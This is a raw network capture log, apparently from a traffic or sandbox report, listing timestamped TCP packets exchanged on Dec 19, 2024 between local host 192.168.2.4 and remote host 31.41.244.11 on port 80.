                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.974097967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.974112988 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.974117041 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.974133968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.974147081 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.974917889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.974957943 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.974992037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.975008965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.975030899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.975045919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.975805998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.975847006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.975867987 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.975884914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.975907087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.975929976 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.976723909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.976769924 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.976788998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.976805925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.976828098 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.976843119 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.977596998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.977637053 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.977662086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.977678061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.977709055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.977709055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.978470087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.978507042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.978554964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.978570938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.978595972 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.978617907 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.979368925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.979409933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.979413986 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.979432106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.979451895 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.979464054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.980336905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.980354071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.980370045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.980387926 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.980402946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.980420113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.981178045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.981219053 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.981225967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.981242895 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.981283903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.981302023 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.982059956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.982100964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.982119083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.982135057 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.982158899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.982175112 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.982995033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.983011007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.983027935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.983036041 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.983061075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.983061075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.983831882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.983872890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.983875036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.983889103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.983913898 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.983930111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.984715939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.984759092 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.984786034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.984802008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.984826088 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.984841108 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.985584021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.985621929 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.985883951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.985923052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.985951900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.985968113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.985987902 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.986004114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.986778975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.986824036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.986825943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.986846924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.986864090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.986887932 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.987665892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.987709045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.987734079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.987749100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.987780094 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.987796068 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.987816095 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.988627911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.988665104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.988711119 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.988728046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.988749981 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.988773108 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.989535093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.989574909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.989574909 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.989593029 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.989614010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.989628077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.990330935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.990380049 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.990391970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.990397930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.990417004 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.990430117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.991219044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.991261005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.991290092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.991306067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.991327047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.991345882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.992115974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.992161989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.992187023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.992204905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.992227077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.992242098 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.993025064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.993065119 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.993072033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.993087053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.993108988 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.993124008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.993905067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.993946075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.993952036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.993969917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.993989944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.994002104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.994776964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.994823933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.994879007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.994925976 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.005093098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.005146980 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.005152941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.005171061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.005196095 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.005209923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.005541086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.005582094 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.005585909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.005603075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.005625010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.005640030 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.006414890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.006457090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.158422947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.158441067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.158459902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.158601999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.158684969 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.158720970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.158736944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.158757925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.158847094 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.159562111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.159606934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.159778118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.159825087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.159833908 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.159849882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.159874916 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.159893036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.160470963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.160514116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.160531998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.160547972 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.160571098 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.160588980 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.161431074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.161447048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.161463022 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.161478996 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.161501884 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.162266970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.162312031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.162322998 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.162328959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.162343979 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.162359953 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.163177013 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.163203001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.163218975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.163228035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.163244963 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.163254976 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.164036989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.164078951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.164105892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.164123058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.164148092 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.164165020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.164908886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.164953947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.164954901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.164973974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.164999008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.165015936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.165790081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.165837049 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.165838957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.165853977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.165877104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.165891886 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.166697025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.166723013 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.166738033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.166744947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.166766882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.166766882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.167583942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.167625904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.167625904 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.167644978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.167689085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.167689085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.168478012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.168505907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.168520927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.168521881 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.168545008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.168559074 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.169377089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.169424057 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.169428110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.169445992 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.169473886 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.169492006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.170229912 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.170274019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.170289040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.170305014 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.170332909 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.170351028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.171152115 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.171196938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.171200991 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.171220064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.171241999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.171258926 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.172092915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.172121048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.172137976 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.172137976 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.172154903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.172173977 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.172920942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.172947884 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.172962904 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.172962904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.172983885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.172997952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.173810959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.173856020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.173882008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.173898935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.173923969 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.173938990 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.174695015 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.174738884 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.174741983 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.174757957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.174782991 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.174799919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.175596952 CET804986031.41.244.11192.168.2.4
